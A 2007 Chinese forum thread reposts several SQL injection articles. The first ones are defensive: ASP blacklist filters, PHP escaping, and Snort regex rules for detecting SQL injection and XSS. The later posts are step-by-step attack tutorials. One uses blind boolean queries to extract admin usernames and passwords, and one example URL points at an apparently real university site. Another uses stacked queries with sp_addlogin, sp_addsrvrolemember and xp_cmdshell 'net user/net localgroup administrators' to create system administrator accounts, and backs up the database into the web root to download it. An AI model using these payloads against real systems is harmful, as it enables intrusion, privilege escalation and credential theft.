SQL注入专题(防范+攻击)全手册

︷мē.飛_ · 发表于 2007-7-3 09:47:47

Dreamweaver中sql注入式攻击的防范
Dreamweaver+ASP可视化编程门槛很低，新手很容易上路。在很短的时间里，新手往往就已经能够编出看来比较完美的动态网站，在功能上，老手能做到的，新手也能够做到。那么新手与老手就没区别了吗？这里面区别可就大了，只不过外行人很难一眼就看出来罢了。界面的友好性、运行性能以及网站的安全性方面是新手与老手之间区别的三个集中点。

在安全性方面，新手最容易忽略的问题就是SQL注入漏洞的问题。用NBSI 2.0对网上的一些ASP网站稍加扫描，就能发现许多ASP网站存在SQL注入漏洞。

所谓SQL注入（SQL injection），就是利用程序员对用户输入数据的合法性检测不严或不检测等设计上的漏洞，故意从客户端提交特殊的代码（SQL命令），收集程序及服务器的信息，获取想得到的资料而进行的攻击。

可见Sql注入攻击得逞的主要原因没有对用户输入的数据进行验证，可以从客户端动态生成Sql命令。
一般的http请求不外乎get 和 post,所以只要我们在程序中过滤所有post或者get请求的参数信息中非法字符，即可实现防范SQL注入攻击。

遗憾的是DW并没有提供相关代码,因此要想防范SQL注入式攻击就需要手工修改，
只要将下面的程序保存为SQLinjection.asp,然后在需要防注入的页面头部调用

就可以做到页面防注入.

如果想整站防注，就在DW生成的Connections目录下的数据库连接文件中添加头部调用或直接添加下面程序代码，需要注意的是，在添加到数据库连接文件中，可能在后台表单添加文章等内容时，如遇到SQL语句系统会误认为SQL攻击而提示出错。

通用程序代码（引自网络做适当更改）如下：

<%
'--------定义部份------------------
dim sql_injdata
SQL_injdata = "'|and|exec|insert|select|delete
|update|count|*|%|chr|mid|master|truncate|char
|declare|1=1|1=2|;"
SQL_inj = split(SQL_Injdata,"|"

'--------POST部份------------------
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.QueryString(SQL_Get),
Sql_Inj(Sql_DATA))>0 Then
Response.Write "<Script Language=JavaScript>
alert('系统提示你!\n\n请不要在参数中包含非法字符尝试注入!\n\n');window.location="&"'"&"index.htm"&"'"&";</Script>"
Response.end
end if
next
Next
End If

'--------GET部份-------------------
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then
Response.Write "<Script Language=JavaScript>
alert('系统提示你!\n\n请不要在参数中包含非法字符尝试注入!\n\n');window.location="&"'"&"index.htm"&"'"&";</Script>"
Response.end
end if
next
next
end if
%>

通过上面的程序，就可以实现抵御从Get方法或Post方法提交的危险SQL注入字符，并警告入侵者后转向到index.htm（首页）。

︷мē.飛_ · 发表于 2007-7-3 09:48:05

PHP与SQL注入攻击
SQL注入攻击是黑客攻击网站最常用的手段。如果你的站点没有使用严格的用户输入检验，那么常容易遭到SQL注入攻击。SQL注入攻击通常通过给站点数据库提交不良的数据或查询语句来实现，很可能使数据库中的纪录遭到暴露，更改或被删除。下面来谈谈SQL注入攻击是如何实现的，又如何防范。

　看这个例子：

// supposed input
$name = “ilia’; DELETE FROM users;”;
mysql_query(“SELECT * FROM users WHERE name=’{$name}’”);

　很明显最后数据库执行的命令是：

SELECT * FROM users WHERE name=ilia; DELETE FROM users

　这就给数据库带来了灾难性的后果--所有记录都被删除了。

　不过如果你使用的数据库是MySQL，那么还好，mysql_query()函数不允许直接执行这样的操作（不能单行进行多个语句操作），所以你可以放心。如果你使用的数据库是SQLite或者PostgreSQL，支持这样的语句，那么就将面临灭顶之灾了。

　上面提到，SQL注入主要是提交不安全的数据给数据库来达到攻击目的。为了防止SQL注入攻击，PHP自带一个功能可以对输入的字符串进行处理，可以在较底层对输入进行安全上的初步处理，也即Magic Quotes。(php.ini magic_quotes_gpc)。如果magic_quotes_gpc选项启用，那么输入的字符串中的单引号，双引号和其它一些字符前将会被自动加上反斜杠\。

　但Magic Quotes并不是一个很通用的解决方案，没能屏蔽所有有潜在危险的字符，并且在许多服务器上Magic Quotes并没有被启用。所以，我们还需要使用其它多种方法来防止SQL注入。

　许多数据库本身就提供这种输入数据处理功能。例如PHP的MySQL操作函数中有一个叫mysql_real_escape_string()的函数，可将特殊字符和可能引起数据库操作出错的字符转义。

　看这段代码：

//如果Magic Quotes功用启用
if (get_magic_quotes_gpc()) {
$name = stripslashes($name);
}else{
$name = mysql_real_escape_string($name);
}

mysql_query(“SELECT * FROM users WHERE name=’{$name}’”);

　注意，在我们使用数据库所带的功能之前要判断一下Magic Quotes是否打开，就像上例中那样，否则两次重复处理就会出错。如果MQ已启用，我们要把加上的\去掉才得到真实数据。

　除了对以上字符串形式的数据进行预处理之外，储存Binary数据到数据库中时，也要注意进行预处理。否则数据可能与数据库自身的存储格式相冲突，引起数据库崩溃，数据记录丢失，甚至丢失整个库的数据。有些数据库如PostgreSQL，提供一个专门用来编码二进制数据的函数pg_escape_bytea()，它可以对数据进行类似于Base64那样的编码。

　如：

// for plain-text data use:
pg_escape_string($regular_strings);

// for binary data use:
pg_escape_bytea($binary_data);

　另一种情况下，我们也要采用这样的机制。那就是数据库系统本身不支持的多字节语言如中文，日语等。其中有些的ASCII范围和二进制数据的范围重叠。

　不过对数据进行编码将有可能导致像LIKE abc%　这样的查询语句失效。

︷мē.飛_ · 发表于 2007-7-3 09:48:36

SQL注入攻击零距离
一次次的SQL注射入侵，一次次的网站被黑，总是那句话，漏洞在所难免，难道一点办法都没吗？这篇文章就是为大家解析下SQL注射的原理，以及给出一些预防方法。
一：基础篇
分析下漏洞产生的原因，主要还是参数没完全过滤。
cntid = Request("cntid")
这样的语句就存在一个注入攻击，首先，没验证是否为整数
解决方法：
<% dim cntid
cntid =replace(request("cntid "),"","")
if (not isnumeric(cntid)) then
call error
response.end
end if
sub Error()
response.write " <table align=center width=300 border=0
cellpadding=4 cellspacing=0 >"
response.write " <tr > "
response.write " <td colspan=2 height=15> "
response.write " <div align=center>
操作: 参数错误!</div>"
response.write " </td>"
response.write " </tr>"
response.write " <tr> "
response.write " <td colspan=2 height=23> "
response.write " <div align=center><br><br>"
response.write " 参数错误!!!非法探测已经被记录 <br><br>"
response.write " <a href=javascript

nclick=history.go(-1)>返回</a>"
response.write " <br><br></div></td>"
response.write " </tr> </table></body></html>"
end sub
%>

这是一个最基础的过滤，如果提交非法参数效果如图1：

那么我们还需要注意什么？
用户名的注册，必须过滤掉一些特殊符号，继续刚才的话题，我们假设是username.
<% dim username
username =replace(request("username "),"","")
if Instr(username,"=")>0 or Instr(username,"%")>0 or Instr(username,chr(32))>0 or Instr(username,"?")>0 or Instr(username,"&")>0 or Instr(username,";")>0 or
Instr(username,",")>0 or Instr(username,"")>0 or Instr(username,",")>0 or Instr
(username,chr(34))>0 or Instr(username,chr(9))>0 or Instr(username,"?")>0 or
Instr(username,">")>0 or Instr(username,"<")>0 or Instr(username,"$")>0 or Instr
(username,"#")>0 or Instr(username,"@")>0 then

call error
response.end
end if
sub Error()
response.write " <table align=center width=300 border=0
cellpadding=4 cellspacing=0 >"
response.write " <tr > "
response.write " <td colspan=2 height=15> "
response.write " <div align=center>操作: 参数错
误!</div>"
response.write " </td>"
response.write " </tr>"
response.write " <tr> "
response.write " <td colspan=2 height=23> "
response.write " <div align=center><br><br>"
response.write " 用户名中含有非法字符(“=”,“%”,
“?”,“&”,“;”,“,”,“”,”?”,“>”,“<”,“$”,“#”,“@”) <br><br>"
response.write " <a
href=javascript

nclick=history.go(-1)>返回</a>"
response.write " <br><br></div></td>"
response.write " </tr> </table></body></html>"
end sub
%>
利用这个原理，我们还能过滤一些可能存在cookies跨站脚本的地方：
只要过滤cookie，java这样的字眼，方法同上。需要注意的事，类似与用户登陆的地方，用户名一定要username =replace(request("username "),"","")，意思就是把’过滤成”，这样做的目的就是预防’ or ‘’=’这样的入侵。
可是如果类似www.xx.com/list.asp? action = search
我们可以这样过滤
<% action=request("action")
select case action
case "search"
call search()
case else
call search()
end select
sub search ()
这里是search的内容
end sub
%>
大家可以看到无论对错，都执行search。这样也可以预防SQL。
二：密码安全
采用不可逆加密是必须的选择，防止别人探测到密码后暴力破解，MD5用艿氖迪址浅＜虻ィ?姹闳フ腋鯩D5函数体，很多源代码都带。
 这里是引入MD5函数
<% dim username
username =md5(md5(replace(request("username "),"","")))
%>
这里就实现了2次MD5加密，一般2-3次就足够了，暴力破解比较困难：）
COOKIES欺骗问题很严重，所以一般后台管理员一定要session验证。实现方法
我们在登入成功后写入
session("btadmin")=rsadmin("admin")
建立一个验证函数cookies.asp
内容如下
<%
if session("btadmin")="" then
response.redirect "admin.asp"
end if
%>

在每个管理员操作文件的开头加上

这样就可以预防非法登陆了：）
我们经常看到验证码这样的东西，这样做是为了预防暴力破解。
实现方法，假设登入为login.asp
我们在开头加：
<%
dim p
randomize ‘对随机数生成器做初始化的动作
p = Int((8999 * Rnd) + 1000)
session("cntcode")=p %>

插入验证代码的表格
<tr>
<td valign=middle>请输入验证码</td>
<td valign=middle>
<INPUT name=yanzhen type=text>
在左边框输入: <%=session("cntcode")%></td></tr>

最后验证程序：
<%
if request("yanzhen")="" or trim(session("cntcode"))
<>trim(replace(request("yanzhen"),"","")) then
response.write " 请正确输入您的验证码。"
response.end
else
%>
程序运行效果如图2：

三：数据库安全
爆库的方法越来越多，我们来看下：如图3

按X档案以前文章一位大侠说的，将/替换为 %5c，确实很多网站都存在这样的漏洞。大家可以清楚的看到数据库地址。
偶什么方法可以预防呢？
。。。（代码见杂志）。。。。。。。。。。。

这是一个数据库连接文件，大部分为conn.asp
关键在与on error resume next出错了也执行下一句
我们看下他的运行效果。

除了图片显示不正常外，没暴露数据库：）
其实浪心建议用WIN2003做服务器，当你用%5c 来替换的时候
_blank>http://127.0.0.1/fourm.asp?cntid=4
自动换成%5cfourm.asp/多个/
_blank>http://127.0.0.1%5cfourm.asp/?cntid=4
找不到服务器，唯一的结果，更厉害：）
还有一种方法就是不让对方下载数据库
方法是
新建一个notdown表，字段为nodown, 数据类型为ole 如图4

保存为mdb.mdb
OK，我们写个nodown.asp
代码如下
。。。（代码见杂志）。。。。。。。。。。。
把他同数据库一同上传到你的空间，或者本地做个IIS，运行nodown.asp
提示添加记录成功。
OK，把数据库重新命名为mdb.asp
直接在浏览器里输入数据库地址：提示
Active Server Pages 错误 ASP 0116
丢失脚本关闭分隔符
/bbs/cntlovebbs.asp，行 44042
Script 块缺少脚本关闭标记(%>)。
用快车下载提示HTTP 500错误
OK到这里数据库安全也过去了：）下面说下浪心新的思维：）没任何技术难度，会VB的都会写：）
四：安全的后台登入
。。。（代码见杂志）。。。。。。。。。。。

OK了：）程序简单的出奇，他的功能可不小哦：）你的网站可以比以前安全许多。

︷мē.飛_ · 发表于 2007-7-3 09:49:08

SQL注入技术和跨站脚本攻击的检测
文章来源：黑基博客　

在最近两年中，安全专家应该对网络应用层的攻击更加重视。因为无论你有多强壮的防火墙规则设置或者非常勤于补漏的修补机制，如果你的网络应用程序开发者没有遵循安全代码进行开发，攻击者将通过80端口进入你的系统。广泛被使用的两个主要攻击技术是SQL注入[ref1]和CSS[ref2]攻击。SQL注入是指：通过互联网的输入区域，插入SQL meta-characters（特殊字符代表一些数据）和指令，操纵执行后端的SQL查询的技术。这些攻击主要针对其他组织的WEB服务器。CSS攻击通过在URL里插入script标签，然后诱导信任它们的用户点击它们，确保恶意Javascript代码在受害人的机器上运行。这些攻击利用了用户和服务器之间的信任关系，事实上服务器没有对输入、输出进行检测，从而未拒绝javascript代码。

这篇文章讨论SQL注入和CSS攻击漏洞的检测技术。网上已经有很多关于这两种基于WEB攻击的讨论，比如如何实施攻击，他们的影响，怎样更好的编制和设计程序防止这些攻击。然而, 对如何检测这些攻击并没有足够的讨论。我们采用流行的开源的IDS Snort[ref 3],组建根据检测这些攻击的规则的正则表达式。附带，Snort默认规则设定包含检测CSS的方法，但是这些容易被避开检测。比如大多通过hex进制编码,如%3C%73%63%72%69%70% 74%3E代替<script>避开检测。

依赖level of paranoia组织的能力，我们已经编写了多种检测相同攻击的规则。如果你希望检测各种可能的SQL注入攻击，那么你需要简单的留意任何现行的SQL meta-characters，如单引号，分号和双重破折号。同样的一个极端检测CSS攻击的方法，只要简单地提防HTML标记的角括号。但这样会检测出很多错误。为了避免这些，这些规则需要修改使它检测更精确些, 当仍然不能避免错误。

在Snort规则中使用pcre(Perl Compatible Regular Expressions)[ref4]关键字，每个规则可以带或不带其他规则动作。这些规则也可以被公用软件如grep(文档搜索工具)使用，来审阅网络服务器日志。但是,需要警惕的是，用户的输入只有当以GET提交请求时，WEB服务器才会记录日记,如果是以POST提交的请求在日记中是不会记录的。

2. SQL注入的正则表示式
当你为SQL注入攻击选择正则表示式的时候，重点要记住攻击者可以通过提交表单进行SQL注入，也可以通过Cookie区域。你的输入检测逻辑应该考虑用户组织的各类型输入(比如表单或Cookie信息)。并且如果你发现许多警告来自一个规则，请留意单引号或者是分号，也许些字符是你的Web应用程序创造的合法的在CookieS中的输入。因此, 您需要根据你的特殊的WEB应用程序评估每个规则。

依照前面提到，一个琐细的检测SQL射入攻击的正则表达式要留意SQL特殊的meta-characters 譬如单引号(’)双重扩则号(--),为了查出这些字符和他们hex等值数, 以下正则表达式适用:

2.1 检测SQL meta-characters的正则表达式
/(\%27)|(\’)|(\-\-)|(\%23)|(#)/ix

解释:
我们首先检查单引号等值的hex，单引号本身或者双重扩折号。这些是MS SQL Server或Oracle的字符, 表示后边的为评论, 随后的都将被忽略。另外，如果你使用MySQL,你需要留意 ’#’和它等值的hex的出现。注意我们不需要检查双重破折号等值的hex, 因为这不是HTML meta-character, 浏览器不会进行编码。并且, 如果攻击者设法手工修改双重破折号为它的hex值%2D(使用代理像Achilles[ref 5]), SQL注入将失败。
加入上述正则表达式的新的Snort规则如下:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection - Paranoid"; flow:to_server,established;uricontent:".pl";pcre:"/(\%27)|(\’)|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack; sid:9099; rev:5;)

在本篇讨论中, uricontent关键字的值为".pl ", 因为在我们的测试环境里, CGI 程序是用Perl写的。uricontent关键字的值取决于您的特殊应用, 这个值也许是".php ", 或" .asp ", 或" .jsp ", 等。从这点考虑, 我们不显示对应的Snort 规则, 但是我们会给出创造这些规则的正则表达式。通过这些正则表达式你可以很简单的创造很多的Snort规则.在前面的正则表达式里, 我们检测双重破折号是因为：即便没有单引号的存在那里也可能是SQL射入点[ref 6]。例如, SQL查询条目只包含数值，如下:

select value1, value2, num_value3 from database
where num_value3=some_user_supplied_number

这种情况，攻击者可以执行额外的SQL查询, 示范提交如下输入:

3; insert values into some_other_table

最后, pcre的修饰符’ i’ 和’ x ’ 是用于分别匹配大小写和忽略空白处的。上面的规则也可以另外扩展来检查分号的存在。然而，分号很可以是正常HTTP应答的一部分。为了减少这种错误，也是为了任何正常的单引号和双重扩折号的出

现，上面的规则应该被修改成先检测＝号的存。用户输入会响应一个GET或POST请求，一般输入提交如下：

username=some_user_supplied_value&password=some_user_supplied_value

因此, SQL 注入尝试将导致用户的输入出现在a = 号或它等效的hex值之后。

2.2 修正检测SQL meta-characters的正则表达式

/((\%3D)|(=))[^\n]*((\%27)|(\’)|(\-\-)|(\%3B)|(

)/i

解释:
这个规则首先留意 = 号或它的hex值(%3D)，然后考虑零个或多个除换行符以外的任意字符，最后检测单引号，双重破折号或分号。

典型的SQL注入会尝试围绕单引号的用途操作原来的查询，以便得到有用的价值。讨论这个攻击一般使用1’or’1’=’1字符串. 但是, 这个串的侦查很容易被逃避，譬如用1’or2>1 --. 然而唯一恒定的部分是最初的字符的值，跟随一单引号，再加’or’。随后的布尔逻辑可能在一定范围上变化，可以是普通样式也可能是非常复杂的。这些攻击可以相当精确被侦测，通过以下的正则表达式。2.3章节讲解。

2.3 典型的 SQL 注入攻击的正则表达式

/\w*((\%27)|(\’))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix

解释:
\w* - 零个或多个字符或者下划线。
(\%27)|\’ - 单引号或它的hex等值。
(\%6 F)|o|(\%4 F))((\%72)|r|-(\%52) －‘or’的大小写以及它的hex等值。

’union’SQL 查询在SQL注入各种数据库中攻击中同样是很常见的。如果前面的正则表达式仅仅检测单引号或则其他的SQL meta characters ，会造成很多的错误存在。你应该进一步修改查询，检测单引号和关键字‘union’。这同样可以进一步扩展其他的SQL关键字，像’select’, ’insert’, ’update’, ’delete’, 等等。

2.4 检测SQL注入，UNION查询关键字的正则表达式

/((\%27)|(\’))union/ix

(\%27)|(\’) - 单引号和它的hex等值
union - union关键字

可以同样为其他SQL查询定制表达式，如 >select, insert, update, delete, drop, 等等.

如果，到这个阶段，攻击者已经发现web应用程序存在SQL注入漏洞，他将尝试利用它。如果他认识到后端服务器式MS SQL server，他一般会尝试运行一些危险的储存和扩展储存过程。这些过程一般以‘sp’或‘xp’字母开头。典型的，他可能尝试运行 ‘xp_cmdshell’扩展储存过程（通过SQL Server执行Windows 命令）。SQL服务器的SA权限有执行这些命令的权限。同样他们可以通过xp_regread, xp_regwrite等储存过程修改注册表。

2.5 检测MS SQL Server SQL注入攻击的正则表达式

/exec(\s|\+)+(s|x)p\w+/ix

解释:
exec - 请求执行储存或扩展储存过程的关键字
(\s|\+)+ - 一个或多个的空白或它们的http等值编码
(s|x) p- ‘sp’或‘xp’字母用来辨认储存或扩展储存过程
\w+ - 一个或多个字符或下划线来匹配过程的名称

3. 跨站脚本(CSS)的正则表达式

当发动CSS攻击或检测一个网站漏洞的时候, 攻击者可能首先使简单的HTML标签如<b>(粗体),<i>(斜体)或<u>(下划线)，或者他可能尝试简单的 script标签如<script>alert("OK")</script>. 因为大多数出版物和网络传播的检测网站是否有css漏洞都拿这个作为例子。这些尝试都可以很简单的被检测出来。然而，高明点的攻击者可能用它的hex值替换整个字符串。这样<script>标签会以%3C%73%63%72%69%70%74%3E出现。另一方面，攻击者可能使用web代理服务器像Achilles会自动转换一些特殊字符如<换成%3C、>换成%3E.这样攻击发生时，URL 中通常以hex等值代替角括号。

下列正则表达式将检测任何文本中包含的html的<、>。它将捉住试图使用< b>、<u>、或<script>。这正则表达式应该忽略大小写。我们需要同时检测角括号和它的hex等值(% 3C|<)。检测hex进制转化的整个字符串，我们必须检测用户输入的数字和%号，即使用[a-z0-9%] 。这可能会导致一些错误出现，不是大部分会检测到真实攻击的。

3.1 一般 CSS 攻击的正则表达式

/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/ix

解释:
((\%3C)|<) －检查<和它hex等值
((\%2F)|\/)*－结束标签/或它的 hex等值
[a-z0-9\%]+ －检查标签里的字母或它hex等值
((\%3E)|>) －检查>或它的hex等值

Snort 规则:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"NII Cross-site scripting attempt"; flow:to_server,established; pcre:"/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/i"; classtype:Web-application-attack; sid:9000; rev:5;)

跨站脚本同样可以使用<img src=>技术。现行默认的snort规则可以被轻易避开。

3.2章节提供了防止这种技术的方法。

3.2 "<img src" CSS 攻击正则表达式

/((\%3C)|<)((\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47))[^\n]+((\%3E)|>)/I

解释:
(\%3 C)|<) -<或它的hex等值
(\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47) -’img’字母或它的大小写hex等值的变化组合
[^\n]+ -除了换行符以外的任何跟随<img的字符
(\%3E)|>) ->或它的hex等值

3.3 CSS 攻击的极端的正则表达式

/((\%3C)|<)[^\n]+((\%3E)|>)/I

解释:
这个规则简单寻找<+除换行符外的任何字符+>。由于你的web服务器和web应用程序的构架，这个规则可能产生一些错误。但它能保证捉住任何CCS或者类似CSS的攻击。

一个不错避开过滤的CSS方法请参考Bugtraq投稿的
http://www.securityfocus.com/archive/1/272...rchive/1/272037.
但是请注意最后一种极端的规则将能检测这所有的攻击。

总结:

在这篇文章中，我们提出了不同种类的正则表达式规则来检测SQL注入和跨站脚本攻击。有些规则简单而极端，一个潜在的攻击都将提高警惕。但这些极端的规则可能导致一些主动的错误。考虑到这点，我们修改了这些简单的规则，利用了另外的样式，他们可以检查的更准确些。在这些网络应用成的攻击检测中，我们推荐将这些作为调试你IDS或日志分析方法的起点。再经过几次修改后，在你对正常网交易部分的非恶意应答进行评估以后，你应该可以准备的检测那些攻击了。

参考
1. SQL Injection

http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf
2. Cross Site Scripting FAQ http://www.cgisecurity.com/articles/xss-

faq.shtml
3. The Snort IDS http://www.snort.org
4. Perl-compatible regular expressions (pcre) http://www.pcre.org
5. Web application proxy, Achilles http://achilles.mavensecurity.com
3. Advanced SQL Injection

http://www.nextgenss.com/papers/advanced_sql_injection.pdf
7. Secure Programming HOWTO, David Wheeler www.dwheeler.com
8. Threats and Countermeasures, MSDN, Microsoft

︷мē.飛_ · 发表于 2007-7-3 09:49:27

菜鸟入门级：SQL注入攻击
文章来源：网页吧

一般国内的小一点的新闻站点程序都有 ""&request 这种漏洞，下面我讲解攻击方法

　　在地址栏：

　　and 1=1

　　查看漏洞是否存在,如果存在就正常返回该页,如果没有,则显示错误，继续假设这个站的数据库存在一个admin表

　　在地址栏：

　　and 0<>(select count(*) from admin)

　　返回页正常,假设成立了。

　　下面来猜猜看一下管理员表里面有几个管理员ID：

　　and 1<(select count(*) from admin)

　　页面什么都没有。管理员的数量等于或者小于1个

　　and 1=(select count(*) from admin)

　　输入=1没显示错误，说明此站点只有一个管理员。

　　下面就是要继续猜测admin 里面关于管理员用户名和密码的字段名称。

and 1=(select count(*) from admin where len(username)>0)

　　猜解错误!不存在 username 这个字段。只要一直改变括号里面的username这个字段,下面给大家几个常用的

user,users,member,members,userlist,memberlist,userinfo,admin,manager,用户,yonghu

用户名称字段猜解完成之后继续猜解密码字段

　　and 1=(select count(*) from admin where len(password)>0)

　　password 字段存在！因为密码字段一般都是这个拉,如果不是就试试pass如果还不是就自己想想吧

　　我们已经知道了管理员表里面有3个字段 id,user,password。

　　id 编号

　　user 用户名

　　password 密码

　　下面继续的就是管理员用户名和密码的猜解了。一个一个来,有点麻烦,最好找个猜解机来

　　先猜出长度!

　　and 1=(select count(*) from admin where len(user)<10)

　　user 字段长度小于10

　　and 1=(select count(*) from admin where len(user)<5)

　　user 字段长度不小于5

　慢慢的来,最后猜出长度等于6,请看下面,返回正常就说明猜解正确

　　and 1=(select count(*) from admin where len(user)=6)

　　下面猜密码,

　and 1=(select count(*) from admin where len(password)=10)

　　猜出来密码10位,不要奇怪,现在网管都有防备的,所以密码上20位也不太奇怪了

下面该做的就是把他们拆开来一个一个猜字母

　　and 1=(select count(*) from admin where left(user,1)=a)

　　返回正常，第一位字母等于a,千万不要把大写和小写给搞错了哦~~呵呵,如果不a就继续猜其他的字符落,反正猜到返回正常就算OK了

　　开始猜解帐号的第二位字符。

　　and 1=(select count(*) from admin where left(user,2)=ad)

　　就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

　　工作还没有完,别忙着跑了,还有10位密码,呵呵

　　and 1=(select count(*) from admin where left(password,1)=a)

　　经过无数次错误之后......

　　http://xyz.hytc.edu.cn/new2/article_view.asp?id=2499 and 1=(select count(*) from admin where left(password,10)=administra)

　　结果密码是administra

　　看完文章,大家不要照着我的文章做,网络上的东西是变幻无穷的,但是我相信大家的大脑肯定比他变得快,所以希望大家看了这个文章灵活运用!那样才能达到理想的效果。

︷мē.飛_ · 发表于 2007-7-3 09:49:53

三步堵死SQL注入漏洞
SQL注入是什么？

　　许多网站程序在编写时，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码（一般是在浏览器地址栏进行,通过正常的www端口访问），根据程序返回的结果，获得某些想得知的数据，这就是所谓的SQL Injection，即SQL注入。
网站的恶梦——SQL注入

　　SQL注入通过网页对网站数据库进行修改。它能够直接在数据库中添加具有管理员权限的用户，从而最终获得系统管理员权限。黑客可以利用获得的管理员权限任意获得网站上的文件或者在网页上加挂木马和各种恶意程序，对网站和访问该网站的网友都带来巨大危害。

防御SQL注入有妙法

　　第一步：很多新手从网上下载SQL通用防注入系统的程序，在需要防范注入的页面头部用来防止别人进行手动注入测试（。

　　可是如果通过SQL注入分析器就可轻松跳过防注入系统并自动分析其注入点。然后只需要几分钟，你的管理员账号及密码就会被分析出来。

第二步：对于注入分析器的防范，笔者通过实验，发现了一种简单有效的防范方法。首先我们要知道SQL注入分析器是如何工作的。在操作过程中，发现软件并不是冲着“admin”管理员账号去的，而是冲着权限（如flag=1）去的。这样一来，无论你的管理员账号怎么变都无法逃过检测。

　　第三步：既然无法逃过检测，那我们就做两个账号，一个是普通的管理员账号，一个是防止注入的账号，为什么这么说呢？笔者想，如果找一个权限最大的账号制造假象，吸引软件的检测，而这个账号里的内容是大于千字以上的中文字符，就会迫使软件对这个账号进行分析的时候进入全负荷状态甚至资源耗尽而死机。下面我们就来修改数据库吧。

　　1.对表结构进行修改。将管理员的账号字段的数据类型进行修改，文本型改成最大字段255（其实也够了，如果还想做得再大点，可以选择备注型），密码的字段也进行相同设置。

　　2.对表进行修改。设置管理员权限的账号放在ID1，并输入大量中文字符（最好大于100个字）。

　　3.把真正的管理员密码放在ID2后的任何一个位置（如放在ID549上）。

　　我们通过上面的三步完成了对数据库的修改。

　　这时是不是修改结束了呢？其实不然，要明白你做的ID1账号其实也是真正有权限的账号，现在计算机处理速度那么快，要是遇上个一定要将它算出来的软件，这也是不安全的。我想这时大多数人已经想到了办法，对，只要在管理员登录的页面文件中写入字符限制就行了！就算对方使用这个有上千字符的账号密码也会被挡住的，而真正的密码则可以不受限制。

︷мē.飛_ · 发表于 2007-7-3 09:50:11

SQL注入实战---利用“dbo”获得SQL管理权限和系统权限
在一个供求信息发布的网站上测试了一下，页面http://www.xxx.com/new/new.asp?id=49

我做了如下测试：(1) http://www.xxx.com/new/new.asp?id=49’

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14
[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误
在查询表达式 'ID=49'' 中。
/new.asp，行36

(2) http://www.xxx.com/new/new.asp?id=49 and 1=1
（正常返回页面）

(3) http://www.xxx.com/new/new.asp?id=49 and 1=2
Microsoft OLE DB Provider for ODBC Drivers 错误 '800a0bcd'
BOF 或 EOF 中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
/new.asp，行42

注：上面的测试已经可以看出有SQL注入的机会，我们用下面一个句子来判断他数据库类型和登陆身份。
Http://www.xxx.com/new/new.asp?id=49 and user>0
Microsoft OLE DB Provider for ODBC Drivers 错误 '800a0bcd'
将nvarchar值 ”dbo” 转换数据类型为 int 的列时发生语法错误
/new.asp，行42
注：如果显示“dbo” 转换数据类型为 int 的列时发生语法错误那么就可以用我下面介绍的方法来获得系统管理权限，如果是“abc” 转换数据类型为 int 的列时发生语法错误那么就用不能用我下面的介绍来获得系统权限了。

获得以上信息后，就可以提交以下URL来一步一步的获得SQL管理员权限和系统权限了。

（1） http://www.xxx.com/new/new.asp?id=49;exec
aster.dbo.sp_addlogin fmzm;--
添加SQL用户

（2） http://www.xxx.com/new/new.asp?id=49;exec master.dbo.sp_password null,fmzm,fmzm;--
设置SQL帐号FMZM 的密码为 FMZM

（3） http://www.xxx.com/new/new.asp?id=49;exec master.dbo.sp_addsrvrolemember sysadmin fmzm;--

提升权限：加FMZM进sysadmin管理组（有时候会不成功，就常识下面的句子
;exec master.dbo.sp_addsrvrolemember fmzm,sysadmin-- 为什么会这样，我也不清清楚，我就遇到了？栽。。。）

（4） http://www.xxx.com/new/new.asp?id=49;exec master.dbo.xp_cmdshell 'net user fmzm fmzm /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
建立一个系统用FMZM 并设置其密码为FMZM
（注：/workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes 这些很关键，如果不加这些，你建立的用户很有可能无法登陆，这些是启用你的帐号，并且使密码永不过期的一些相关设置。）

（5） http://www.xxx.com/new/new.asp?id=49;exec master.dbo.xp_cmdshell 'net localgroup administrators fmzm /add';--

把帐号FMZM加入到管理员组

OK，到此为止，已经得到了SQL管理权限和系统权限了，还有什么不能做的呢？把上面的句子变个形开个TELNET，或者用SQL连接器去连接，随便你怎么整了，记得别暴露自己哦

目前有些好的IDS已经开始监视xp_cmdshell这些关键字了.

附：（1） http://Site/url.asp?id=1 ;;and db_name()>0

前面有个类似的例子and user>0，作用是获取连接用户名，db_name()是另一个系统变量，返回的是连接的数据库名。

（2） http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db’;--

这是相当狠的一招，从③拿到的数据库名，加上某些IIS出错暴露出的绝对路径，将数据库备份到Web目录下面，再用HTTP把整个数据库就完完整整的下载回来，所有的管理员及用户密码都一览无遗！在不知道绝对路径的时候，还可以备份到网络地址的方法（如\\202.96.xx.xx\Share\1.db），但成功率不高。

　　（3） http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0

sysobjects是SQLServer的系统表，存储着所有的表名、视图、约束及其它对象，xtype=’U’ and status>0，表示用户建立的表名，上面的语句将第一个表名取出，与0比较大小，让报错信息把表名暴露出来。第二、第三个表名怎么获取？还是可以
自己考虑下。

（4） http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0

从（3）拿到表名后，用object_id(‘表名’)获取表名对应的内部ID，col_name(表名ID,1)代表该表的第1个字段名，将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。

︷мē.飛_ · 发表于 2007-7-3 09:50:31

